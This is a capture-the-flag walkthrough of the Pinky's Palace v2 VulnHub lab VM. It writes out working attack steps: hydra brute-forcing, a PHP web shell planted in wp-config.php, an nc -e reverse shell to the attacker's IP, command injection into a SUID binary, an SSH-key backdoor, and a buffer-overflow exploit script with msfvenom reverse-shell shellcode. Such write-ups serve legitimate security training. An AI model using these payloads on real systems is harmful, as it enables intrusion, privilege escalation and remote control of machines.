Preface
⏰Date: 2023.7.28
🗺️Target VM: https://download.vulnhub.com/pinkyspalace/Pinkys-Palace2.zip
⚠️All operations in this post were carried out in a lab VM; never use them against real systems without authorization.
🙏My knowledge is limited; please point out any mistakes. Thank you for reading!
🎉Follows, likes, favorites and comments are welcome.
Information Gathering
We can use netdiscover, arp-scan or nmap to discover hosts on the network.
┌──(eric㉿kali)-[~]
└─$ nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 14:33 HKT
Nmap scan report for 192.168.58.2
Host is up (0.00097s latency).
Nmap scan report for 192.168.58.153
Host is up (0.00026s latency).
Nmap scan report for 192.168.58.161
Host is up (0.00066s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 6.32 seconds
The target this time is 192.168.58.161.
To simplify the later steps, store the target IP in a variable.
┌──(eric㉿kali)-[~]
└─$ export T='192.168.58.161'
┌──(eric㉿kali)-[~]
└─$ echo $T
192.168.58.161
┌──(eric㉿kali)-[~]
└─$ nmap -sC -A -T4 -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 14:47 HKT
Nmap scan report for 192.168.58.161
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp filtered unknown
7654/tcp filtered unknown
31337/tcp filtered Elite
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.34 seconds
The target runs WordPress.
Visiting port 80, the page does not render correctly; clicking login changes the URL to http://pinkydb/wp-login.php
The hostname and IP have to be added to the hosts file.
On the site's home page, click passione.
This reveals a username: pinky1337
┌──(eric㉿kali)-[~]
└─$ nikto -h pinkydb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.58.161
+ Target Hostname: pinkydb
+ Target Port: 80
+ Start Time: 2023-07-27 15:09:48 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal Link header found with value: <http://pinkydb/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /secret/: Directory indexing found.
+ /secret/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ /wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login.php: Wordpress login found.
+ 7850 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-07-27 15:10:01 (GMT8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
A secret directory shows up; let's take a look.
The text file in it contains:
8890
7000
666
pinkydb
Three port numbers are provided, so port knocking is probably needed; the earlier scan showed three ports that were not open (filtered).
Port Knocking
Port knocking is a security measure that keeps open ports from being found by direct probing: only after knocking on the correct sequence of ports does the firewall open the real port to the outside.
After some testing, the correct knock sequence was found.
┌──(eric㉿kali)-[~]
└─$ export T=pinkydb
┌──(eric㉿kali)-[~]
└─$ for i in {7000,666,8890};do nc -vz $T $i;done
pinkydb [192.168.58.161] 7000 (bbs) : Connection refused
pinkydb [192.168.58.161] 666 (?) : Connection refused
pinkydb [192.168.58.161] 8890 (?) : Connection refused
┌──(eric㉿kali)-[~]
└─$ nmap $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 16:10 HKT
Nmap scan report for pinkydb (192.168.58.161)
Host is up (0.00068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
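To make the mechanism concrete, here is an added model (not code from the writeup or from the knock daemon on the VM) of how a knock daemon tracks one source's progress through the sequence found in /secret. The struct and function names are assumptions; a real daemon would additionally key this state by source address and expire it after a timeout.

```c
// Added example: minimal knock-sequence tracker, modelled on the
// 7000, 666, 8890 sequence from the writeup. Names are assumptions.
#include <stddef.h>
#include <stdio.h>

#define KNOCK_LEN 3
static const int KNOCK_SEQ[KNOCK_LEN] = {7000, 666, 8890};

/* Per-source state: how many knocks of the sequence have been seen in order. */
struct knocker { int progress; int opened; };

/* Feed one observed connection attempt (a SYN to a closed port) from a source.
 * Returns 1 when the full sequence has just been completed (a daemon would now
 * insert a firewall rule for that source), 0 otherwise. A wrong port resets
 * progress, so the order matters, not merely the set of ports. */
int knock_observe(struct knocker *k, int port) {
    if (port == KNOCK_SEQ[k->progress]) {
        k->progress++;
    } else {
        /* a wrong knock restarts; the wrong port may itself be the first knock */
        k->progress = (port == KNOCK_SEQ[0]) ? 1 : 0;
    }
    if (k->progress == KNOCK_LEN) {
        k->progress = 0;
        k->opened = 1;
        return 1;
    }
    return 0;
}

/* Run a whole sequence of knocks and report whether it opened the port. */
int knock_sequence_opens(const int *ports, size_t n) {
    struct knocker k = {0, 0};
    for (size_t i = 0; i < n; i++) knock_observe(&k, ports[i]);
    return k.opened;
}

int main(void) {
    int as_listed[] = {8890, 7000, 666};   /* order as written in /secret */
    int as_knocked[] = {7000, 666, 8890};  /* order that worked in the writeup */
    printf("listed order opens:  %d\n", knock_sequence_opens(as_listed, 3));
    printf("knocked order opens: %d\n", knock_sequence_opens(as_knocked, 3));
    return 0;
}
```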
After the knock, 31337 is open; scan it further.
┌──(eric㉿kali)-[~]
└─$ nmap -sT -Pn -T4 -A -v -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 16:11 HKT
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 4.9.4
|_http-title: Pinky's Blog – Just another WordPress site
|_http-server-header: Apache/2.4.25 (Debian)
4655/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:e6:41:77:60:1f:e8:7c:02:13:ae:a1:33:09:94:b7 (RSA)
| 256 3a:48:63:f9:d2:07:ea:43:78:7d:e1:93:eb:f1:d2:3a (ECDSA)
|_ 256 b1:10:03:dc:bb:f3:0d:9b:3a:e3:e4:61:03:c8:03:c7 (ED25519)
7654/tcp open http nginx 1.10.3
|_http-title: Pinkys Database
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
31337/tcp open Elite?
| fingerprint-strings:
| GetRequest:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| HTTP/1.0
| NULL:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| SIPOptions:
| [+] Welcome to The Daemon [+]
| This is soon to be our backdoor
| into Pinky's Palace.
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
|_ Accept: application/sdp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94%I=7%D=7/27%Time=64C226A8%P=x86_64-pc-linux-gnu%r(N
SF:ULL,59,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x20i
SF:s\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palace\.
SF:\n=>\x20\0")%r(GetRequest,6B,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\
SF:x20\[\+\]\n\0This\x20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\
SF:x20Pinky's\x20Palace\.\n=>\x20\0GET\x20/\x20HTTP/1\.0\r\n\r\n")%r(SIPOp
SF:tions,138,"\[\+\]\x20Welcome\x20to\x20The\x20Daemon\x20\[\+\]\n\0This\x
SF:20is\x20soon\x20to\x20be\x20our\x20backdoor\n\0into\x20Pinky's\x20Palac
SF:e\.\n=>\x20\0OPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20n
SF:m;branch=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r
SF:\nCall-ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\
SF:nContent-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20applicat
SF:ion/sdp\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Initiating NSE at 16:11
Completed NSE at 16:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.87 seconds
Port 31337 announces itself as a backdoor; connect with nc and take a look.
┌──(eric㉿kali)-[~]
└─$ nc $T 31337
[+] Welcome to The Daemon [+]
This is soon to be our backdoor
into Pinky's Palace.
=> aa
aa
This program echoes back whatever is entered, so it may be vulnerable to an overflow.
Port 7654
Visit port 7654 and click login.
A quick test of the login form found no SQL injection, so we brute-force the login instead.
Known usernames:
admin
pinky
pinky1337
Use cewl to crawl the site for candidate passwords.
┌──(eric㉿kali)-[~]
└─$ sudo cewl -d 1 -w pass.txt http://pinkydb
# -d 1: crawl only links one level deep on the site, not second or deeper levels
┌──(eric㉿kali)-[~]
└─$ wc -l pass.txt
161 pass.txt
Brute-force the login with hydra.
┌──(eric㉿kali)-[~]
└─$ sudo hydra -L users.txt -P pass.txt -s 7654 pinkydb http-post-form '/login.php:user=^USER^&pass=^PASS^:Invalid'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-27 21:38:43
[DATA] max 16 tasks per 1 server, overall 16 tasks, 483 login tries (l:3/p:161), ~31 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[7654][http-post-form] host: pinkydb login: pinky password: Passione
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-27 21:38:48
Login succeeded.
ssh@Stefano
The hint says to log in with Stefano's RSA private key.
┌──(eric㉿kali)-[~/Downloads]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,BAC2C72352E75C879E2F26CC61A5B6E7
-----END RSA PRIVATE KEY-----
Fix the private key permissions.
chmod 600 id_rsa
┌──(eric㉿kali)-[~/Downloads]
└─$ ssh -i id_rsa stefano@192.168.58.161 -p 4655
The authenticity of host '[192.168.58.161]:4655 ([192.168.58.161]:4655)' can't be established.
ED25519 key fingerprint is SHA256:eHeaw9ls2D7S0rtTOflDFzyMzhGnlr+SbLsQSa8HdbU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:2: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.58.161]:4655' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
A passphrase is still required.
Use ssh2john to extract a crackable hash from the private key.
ssh2john id_rsa > hash.hash
┌──(eric㉿kali)-[~/Downloads]
└─$ john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101 (id_rsa)
1g 0:00:00:00 DONE (2023-07-27 21:49) 2.439g/s 3184Kp/s 3184Kc/s 3184KC/s secter..secretshadow
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With the cracked passphrase, log in over SSH again.
┌──(eric㉿kali)-[~/Downloads]
└─$ ssh -i id_rsa stefano@192.168.58.161 -p 4655
The authenticity of host '[192.168.58.161]:4655 ([192.168.58.161]:4655)' can't be established.
ED25519 key fingerprint is SHA256:eHeaw9ls2D7S0rtTOflDFzyMzhGnlr+SbLsQSa8HdbU.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:2: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.58.161]:4655' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
stefano@Pinkys-Palace:~$
Login succeeded.
Moving to www-data
stefano@Pinkys-Palace:~$ ls
tools
stefano@Pinkys-Palace:~$ cd tools
stefano@Pinkys-Palace:~/tools$ ls
note.txt qsub
stefano@Pinkys-Palace:~/tools$ cat note.txt
Pinky made me this program so I can easily send messages to him.
stefano@Pinkys-Palace:~/tools$ ls -la
total 28
drwxr-xr-x 2 stefano stefano 4096 Mar 17 2018 .
drwxr-xr-x 4 stefano stefano 4096 Mar 17 2018 ..
-rw-r--r-- 1 stefano stefano 65 Mar 16 2018 note.txt
-rwsr----x 1 pinky www-data 13384 Mar 16 2018 qsub
There is a SUID file, but it is owned by pinky and we cannot read it.
We can try to get a shell as the www-data user.
Let's search for files we can write to.
stefano@Pinkys-Palace:/var/www$ find . -writable
./html/apache/wp-config.php
Edit wp-config.php and add:
system($_GET['cmd']);
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=ls
index.php
latest.tar.gz
license.txt
readme.html
secret
wordpress
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Check whether the target has an nc that can spawn a reverse shell.
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=which%20nc%3Bnc%20-h%202%3E%261
/bin/nc
[v1.10-41+b1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
┌──(eric㉿kali)-[~]
└─$ curl http://pinkydb/wp-config.php?cmd=nc%20-e%20%2Fbin%2Fbash%20192.168.58.153%205555
The reverse shell comes back; upgrade it to a pty:
python -c 'import pty;pty.spawn("/bin/bash")'
Next we need to download the SUID file qsub for analysis.
www-data@Pinkys-Palace:/home/stefano/tools$ python -m SimpleHTTPServer 4444
python -m SimpleHTTPServer 4444
Serving HTTP on 0.0.0.0 port 4444 ...
┌──(eric㉿kali)-[~]
└─$ wget http://pinkydb:4444/qsub
--2023-07-27 22:42:19-- http://pinkydb:4444/qsub
Resolving pinkydb (pinkydb)... 192.168.58.161
Connecting to pinkydb (pinkydb)|192.168.58.161|:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13384 (13K) [application/octet-stream]
Saving to: ‘qsub’
qsub 100%[====================================>] 13.07K --.-KB/s in 0s
2023-07-27 22:42:19 (153 MB/s) - ‘qsub’ saved [13384/13384]
Moving to Pinky
Inspect qsub with strings:
/bin/echo %s >> /home/pinky/messages/stefano_msg.txt
%s <Message>
TERM
[+] Input Password:
Bad hacker! Go away!
[+] Welcome to Question Submit!
[!] Incorrect Password!
In Ghidra it can be seen that the program reads the value of an environment variable and compares it with the user's input.
Check TERM to see the password, then craft the command input.
stefano@Pinkys-Palace:~/tools$ echo $TERM
xterm-256color
stefano@Pinkys-Palace:~/tools$ ./qsub ';/bin/bash; #'
[+] Input Password: xterm-256color
pinky@Pinkys-Palace:~/tools$
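As an added illustration (not the source of qsub, which the writeup only examined in Ghidra), the C below shows the two flaws described above beside a hardened replacement: the password check against TERM, and the message spliced into a shell command line. Function names, buffer sizes and the use of system() in the original are assumptions drawn from the strings output.

```c
// Added example: the qsub design flaws next to a hardened form.
// Not the VM's binary; names and sizes are assumptions.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MSG_FILE "/home/pinky/messages/stefano_msg.txt"

/* Flaw 1: the "password" comes from TERM, an environment variable that the
 * unprivileged caller of a set-uid binary fully controls (export TERM=x).
 * Returns 1 on a match, which proves nothing about who the caller is. A
 * set-uid program must rely on getuid()/file mode, never on its environment. */
int password_from_env(const char *supplied) {
    const char *secret = getenv("TERM");
    return secret != NULL && strcmp(secret, supplied) == 0;
}

/* Flaw 2: the message is pasted into a shell command. A message such as
 * ";/bin/bash; #" terminates the echo and runs a shell with the binary's
 * set-uid privileges. Writes the command the original would hand to system(). */
void build_cmd(char *out, size_t outlen, const char *msg) {
    snprintf(out, outlen, "/bin/echo %s >> " MSG_FILE, msg);
    /* the original then calls system(out) */
}

/* Hardened: no shell involved. The message is written with write(2) to a file
 * opened O_APPEND, so shell metacharacters in it are plain data.
 * Returns 0 on success, -1 on failure. */
int append_message(const char *path, const char *msg) {
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT, 0640);
    if (fd < 0) return -1;
    size_t len = strlen(msg);
    int rc = 0;
    if (write(fd, msg, len) != (ssize_t)len || write(fd, "\n", 1) != 1) rc = -1;
    close(fd);
    return rc;
}

int main(int argc, char **argv) {
    const char *msg = argc > 1 ? argv[1] : ";/bin/bash; #";  /* payload from the writeup */
    char cmd[512];
    build_cmd(cmd, sizeof cmd, msg);
    printf("command the original would run: %s\n", cmd);
    printf("TERM matches input: %d\n", password_from_env(msg));
    return 0;
}
```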
We now have the pinky user.
It is not a complete pinky session, though; newgrp can be used to switch back to the default group.
Alternatively, drop in a public key and connect as pinky.
pinky@Pinkys-Palace:/home/pinky/.ssh$ wget http://192.168.58.153:3333/authorized_keys
--2023-07-27 08:31:57-- http://192.168.58.153:3333/authorized_keys
Connecting to 192.168.58.153:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: ‘authorized_keys’
authorized_keys 100%[===================================>] 563 --.-KB/s in 0s
2023-07-27 08:31:57 (177 MB/s) - ‘authorized_keys’ saved [563/563]
┌──(root㉿kali)-[~/.ssh]
└─# ssh -l pinky pinkydb -p 4655
Moving to Demon
Search for writable files.
pinky@Pinkys-Palace:~$ 2>/dev/null find / -writable | grep -Ev '/proc|/sys|/run|/dev'
/tmp
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/var/tmp
/var/www/html/apache/wp-config.php
/var/lock
/var/lib/php/sessions
/home/stefano/tools/qsub
/home/pinky
/home/pinky/.bash_history
/home/pinky/.bashrc
/home/pinky/.profile
/home/pinky/.bash_logout
/home/pinky/.ssh
/home/pinky/.ssh/authorized_keys
/home/pinky/messages
/home/pinky/messages/stefano_msg.txt
/usr/local/bin/backup.sh
Look at this backup.sh.
The file belongs to the demon user, but pinky has full permissions on it; a backup script like this is probably run by a cron job.
Start a listener: nc -nvlp 6666
Add to backup.sh:
After a while a shell comes back.
Analyzing panel
Keep searching for exploitable files.
2>/dev/null find / -user demon | grep -Ev '/proc|/sys|/user'
Note that /daemon/panel is a binary.
The file is owned by root; is it the program behind port 31337?
Analyze it with gdb; info functions shows whether any overflow-prone functions are used.
The strcpy function is present.
Start the program with run.
It is indeed the program on port 31337.
Stop it first.
In the handlecmd function we find the strcpy call, which is at risk of overflow.
Build the exploit.
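An added example, not the panel source: the unbounded strcpy() pattern found in handlecmd next to a bounded version that rejects over-long lines. CMD_CAP and the function names are assumptions; the real stack layout is known only from the 120-byte offset the writeup measures.

```c
// Added example: unbounded strcpy() versus a bounded copy with rejection.
// Not the VM's panel binary; CMD_CAP and names are assumptions.
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>

#define CMD_CAP 64   /* assumed size of the stack buffer in handlecmd */

/* Vulnerable pattern: strcpy() stops only at the NUL byte, so a line longer
 * than CMD_CAP-1 bytes runs past cmd[] into the saved registers and return
 * address; the cyclic-pattern offset in the writeup measures that distance.
 * Kept for comparison only; never called in this file. */
void handlecmd_unsafe(const char *line) {
    char cmd[CMD_CAP];
    strcpy(cmd, line);            /* unbounded copy */
    printf("%s\n", cmd);          /* the daemon echoes the input back */
}

/* Hardened: measure before copying, refuse anything that does not fit with its
 * terminator, and never read past outcap bytes of the input. Returns the number
 * of bytes accepted, or -1 when the line was rejected (the caller should drop
 * the line or the connection rather than truncate silently). */
int handlecmd_safe(const char *line, char *out, size_t outcap) {
    size_t n = strnlen(line, outcap);
    if (n >= outcap) return -1;   /* needs n+1 bytes including the NUL */
    memcpy(out, line, n + 1);
    return (int)n;
}

int main(void) {
    char line[1024], out[CMD_CAP];
    /* reads lines from stdin as the daemon would read them from the socket */
    while (fgets(line, sizeof line, stdin) != NULL) {
        line[strcspn(line, "\r\n")] = '\0';
        int n = handlecmd_safe(line, out, sizeof out);
        if (n < 0) printf("rejected: line longer than %d bytes\n", CMD_CAP - 1);
        else printf("%s\n", out);
    }
    return 0;
}
```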
gdb panel
pattern_create 200 # generate a cyclic test pattern
disassemble handlecmd # disassemble the function
b *handlecmd+70 # set a breakpoint
run
ctrl+c
c # continue
# copy the generated pattern and send it to 31337
python -c 'print("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")'|nc localhost 31337
Copy the line shown under stack and use the offset command to find the offset.
python -c 'print("A"*120+"B"*6)'|nc localhost 31337
Find the address of rsp.
Generate the payload with msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp lhost=192.168.58.153 lport=7777 -b '\x00\x0a\x0b' -f python
The rsp address 0x400cfb is little-endian; written out byte by byte for transmission it becomes \xfb\x0c\x40\x00\x00\x00 in the script.
The final script is:
#! /usr/bin/env python2
import sys
import socket as so

# shellcode generated by msfvenom (linux/x64/shell_reverse_tcp)
buf = b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\x22\x80\x09\xe7\x68"
buf += b"\xff\x4e\x13\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x48\xa9\x51\x7e\x02\xfd\x11\x79\x23"
buf += b"\xde\x06\xe2\x20\x68\x06\xaa\x20\x80\x17\x86\xa8"
buf += b"\x57\x74\x8a\x73\xc8\x80\x01\x02\xef\x14\x79\x08"
buf += b"\xd8\x06\xe2\x02\xfc\x10\x5b\xdd\x4e\x63\xc6\x30"
buf += b"\xf0\x4b\x66\xd4\xea\x32\xbf\xf1\xb7\xf5\x3c\x40"
buf += b"\xe9\x67\xc8\x1b\x97\x4e\x40\x6a\x09\xee\xb5\x3f"
buf += b"\xb7\xc7\xf5\x2d\x85\x09\xe7\x68\xff\x4e\x13"
# NOP + shellcode fill the 120 bytes up to the saved return address,
# followed by the rsp address 0x400cfb in little-endian byte order
buff = "\x90" + buf + "\xfb\x0c\x40\x00\x00\x00"

try:
    server = str(sys.argv[1])
    port = int(sys.argv[2])
except IndexError:
    print("Usage Example: python %s 192.168.58.158 8080" % sys.argv[0])
    sys.exit()

s = so.socket(so.AF_INET, so.SOCK_STREAM)
print "Attempt to send payload to panel..."
try:
    s.connect((server, port))
    s.send(buff + '\r\n')
    print "[+] Completed!"
except:
    print "[!] Unable to connect panel!"
nc -nvlp 7777
python2 exp.py 192.168.58.161 31337